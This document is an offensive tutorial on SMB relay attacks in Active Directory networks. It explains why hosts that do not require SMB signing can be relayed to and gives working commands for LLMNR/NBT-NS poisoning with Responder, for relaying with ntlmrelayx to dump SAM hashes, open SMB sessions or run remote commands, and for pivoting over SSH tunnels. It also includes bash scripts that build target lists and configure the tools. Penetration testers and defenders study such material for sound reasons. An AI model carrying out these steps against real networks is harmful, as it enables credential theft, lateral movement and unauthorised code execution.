
SMB Relay

Note: Network Environment

This attack works best on a flat network. It can also work across network segments as long as the attacker machine and the target(s) can route to each other and no firewall blocks the required ports: the victim must be able to reach the attacker's SMB (445/tcp) or HTTP listener, and the attacker must be able to reach 445/tcp on the relay targets.

What is SMB Relay?

An attacker positioned between an NTLM client and server (on a LAN, typically by poisoning LLMNR, NBT-NS and mDNS name lookups so that clients connect to the attacker by mistake) receives the client's NTLM authentication messages. Instead of terminating the authentication, the attacker forwards those messages to another host on the network and is authenticated there as the victim user, without ever learning the password.

What's the Flaw?

Many Active Directory networks run with SMB signing enabled but not required. That is the default on Windows workstations and on member servers; only domain controllers require signing by default. (Windows 11 24H2 and Windows Server 2025 changed the default to require signing, so expect fewer relayable hosts as those roll out.) A host that does not require signing accepts an unsigned session, so a relayed authentication is indistinguishable from a legitimate one.

Detecting SMB Signing Mode

sudo nmap --script=smb2-security-mode -p445 target(s)

Hosts reporting "Message signing enabled but not required" (or "disabled") can be relayed to; hosts reporting "Message signing enabled and required" cannot. CrackMapExec's --gen-relay-list performs the same check and writes the relayable hosts straight to a targets file.
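As an added example (not from the original page), the following bash script turns the nmap check into an ntlmrelayx targets file: it parses nmap's normal output and keeps only hosts whose signing mode allows relay. The subnet and the scan output are constructed placeholders, and scan_smb_signing and relay_targets are names chosen here.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): build an ntlmrelayx targets
# file from an nmap smb2-security-mode scan. Hosts reporting "enabled but
# not required" or "disabled" can be relayed to; "enabled and required"
# cannot.

# Run the scan from the page and save normal output for parsing.
# Not executed in the demo below; the subnet is a placeholder.
scan_smb_signing() {            # usage: scan_smb_signing 10.0.0.0/24 > scan.txt
    sudo nmap -Pn -p445 --open --script=smb2-security-mode "$@"
}

# Parse nmap normal output on stdin and print one relayable IP per line.
# Handles both "Nmap scan report for 10.0.0.5" and
# "Nmap scan report for host.corp.local (10.0.0.5)".
relay_targets() {
    awk '
        /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip); next }
        /smb2-security-mode/    { in_script = 1; next }
        in_script && /Message signing/ {
            if ($0 ~ /not required|disabled/) print ip
            in_script = 0
        }
    '
}

# Constructed sample scan output (no real hosts): a DC that requires
# signing, a workstation that does not, a host with 445 closed, and a
# legacy host with signing disabled.
SAMPLE_NMAP=$(cat <<'EOF'
Nmap scan report for dc01.corp.local (10.0.0.1)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.5
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.6
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:0:2:
|_    Message signing is disabled and not required!
EOF
)

# Demo on the constructed output: prints the hosts a relay could target.
# Real use: scan_smb_signing 10.0.0.0/24 | relay_targets > targets.txt
printf '%s\n' "$SAMPLE_NMAP" | relay_targets
```

The resulting targets.txt is what the -tf option of ntlmrelayx expects; the domain controller is left out because it requires signing and the relay would be rejected there.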

How is it Exploited?

Using a tool like Responder, the attacker poisons name lookups and listens for the resulting SMB (and HTTP) connections. When a client connects, Responder prints the user's NTLMv2 authentication: the username, the domain and the NTLMv2-SSP challenge/response. This is not the NT hash and is not reusable on its own: the response is computed over the challenge Responder just sent, so it can be cracked offline but cannot be passed to other hosts. That is why the credential has to be relayed while the authentication is still in flight.

Instead of capturing the authentication, the attacker uses a tool like ntlmrelayx.py to answer the client and forward each NTLM message to another host on the network, authenticating there as the victim. Two conditions apply: the target must not require SMB signing, and the relayed user needs sufficient rights on the target for whatever comes next (local administrator for dumping the SAM or executing commands). Relaying back to the host the authentication came from has been blocked since MS08-068, so the target must be a different machine.

The Attack

Internal

Part 1: Responder

Responder's own listeners are enabled and disabled in its configuration file, /etc/responder/Responder.conf. For a relay attack Responder must only poison name resolution; the SMB and HTTP servers are provided by ntlmrelayx, so turn Responder's off, otherwise Responder answers the victim first and the authentication never reaches the relay:

  • SMB = Off   (SMB server is hosted by ntlmrelayx)
  • HTTP = Off  (HTTP server is hosted by ntlmrelayx)

sudo responder -I <interface-name> -dvw

-w starts the WPAD proxy so that browsers looking for a proxy configuration also authenticate to the attacker; -v is verbose output.


Part 2a: ntlmrelayx (dump hashes)

The Kali Linux packagers ship wrappers around the Impacket scripts, so ntlmrelayx.py can also be invoked as impacket-ntlmrelayx.

sudo ntlmrelayx.py -tf <targets-file> -smb2support

<targets-file> holds one target per line (IP, hostname or smb://host). With no other action specified, ntlmrelayx dumps the local SAM of each target on which the relayed user is a local administrator and prints the NT hashes, which can then be used for pass-the-hash.


Part 2b: ntlmrelayx (bind shell)

Opens an interactive SMB client session on the target (browse shares, ls, get, put; not a command shell), bound to a TCP socket on localhost. ntlmrelayx prints the port it chose (starting at 11000) as each session is established.

sudo ntlmrelayx.py -tf <targets-file> -smb2support -i

Once the session is established, connect to the socket with netcat:

nc 127.0.0.1 <port>

Then issue commands to the SMB client session established on the target (help lists them).


Part 2c: ntlmrelayx (RCE)

sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'

The command runs on each target where the relayed user is a local administrator, and its output is returned to the ntlmrelayx console.
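The setup in Parts 1 and 2 above, as an added bash example that is not from the original page: it switches Responder's SMB and HTTP servers off in the config, refuses to start Responder until that is verified, and launches ntlmrelayx with the flags from the page. The Responder.conf excerpt is a constructed sample, and the function names are assumptions made here; the config path is the Kali one given on the page.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): prepare Responder to coexist
# with ntlmrelayx and launch both. Responder's own SMB and HTTP servers must
# be off, otherwise Responder answers the victim's connection, captures the
# NTLMv2 response and the authentication never reaches ntlmrelayx.

RESPONDER_CONF=/etc/responder/Responder.conf   # Kali path, as on the page

# Switch the SMB and HTTP servers off in a Responder.conf-style file.
# HTTPS stays untouched because the pattern requires "=" right after the name.
disable_responder_servers() {
    local conf=$1
    sed -E 's/^(SMB|HTTP)[[:space:]]*=[[:space:]]*On[[:space:]]*$/\1 = Off/' "$conf" > "$conf.tmp" \
        && mv "$conf.tmp" "$conf"
}

# Return 0 only when both servers are off; run this before starting the relay.
check_relay_config() {
    local conf=$1
    grep -Eq '^SMB[[:space:]]*=[[:space:]]*Off' "$conf" \
        && grep -Eq '^HTTP[[:space:]]*=[[:space:]]*Off' "$conf"
}

# Part 1: poison name resolution only, with the flags used on the page.
start_responder() {             # usage: start_responder eth0
    check_relay_config "$RESPONDER_CONF" \
        || { echo "Responder SMB/HTTP still On in $RESPONDER_CONF" >&2; return 1; }
    sudo responder -I "$1" -dvw
}

# Part 2: relay to every host in the targets file. With no extra args the
# SAM is dumped (2a); pass -i for the interactive SMB client (2b) or
# -c 'cmd' for command execution (2c).
start_relay() {                 # usage: start_relay targets.txt [extra ntlmrelayx args]
    local targets=$1; shift
    sudo impacket-ntlmrelayx -tf "$targets" -smb2support "$@"
}

# Constructed Responder.conf excerpt (server section only) for the demo;
# on an engagement box edit the real file named in RESPONDER_CONF.
SAMPLE_CONF='[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On'

# Demo on a temporary copy of the excerpt (no services are started).
demo=$(mktemp)
printf '%s\n' "$SAMPLE_CONF" > "$demo"
disable_responder_servers "$demo"
check_relay_config "$demo" \
    && echo "SMB and HTTP off: Responder will only poison, ntlmrelayx will answer"
rm -f "$demo"
```

On a live engagement run start_responder and start_relay in two terminals (or tmux panes), Responder first; the config check in start_responder is there because a stale Responder.conf with SMB = On is the most common reason a relay "never sees" any authentication.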


 

External

Port Forwarding

Carrying out this attack on an external assessment requires a fair amount of port forwarding and proxying through a host you already control. The goal is to:

  1. Redirect the SMB authentication traffic arriving at the compromised host to the listener (Responder or ntlmrelayx) on the attacker's host, for example with a reverse SSH tunnel (ssh -R) that binds 445/tcp on the pivot and forwards it to the attacker's listener
  2. Relay the authentication back into the network through a SOCKS proxy (ssh -D with proxychains) or a port redirection to the target IP

Transfer Tooling Internally

Another option, once a foothold on an internal host has been obtained, is to transfer the tooling onto that host and run it from inside the network, which avoids the tunnelling above.

  • If Python is installed on the host, Responder and Impacket can potentially be run there directly
  • Inveigh provides similar capabilities (LLMNR/NBT-NS/mDNS spoofing and NTLM capture, with Inveigh-Relay for relaying) from PowerShell
  • Other tooling may also be suitable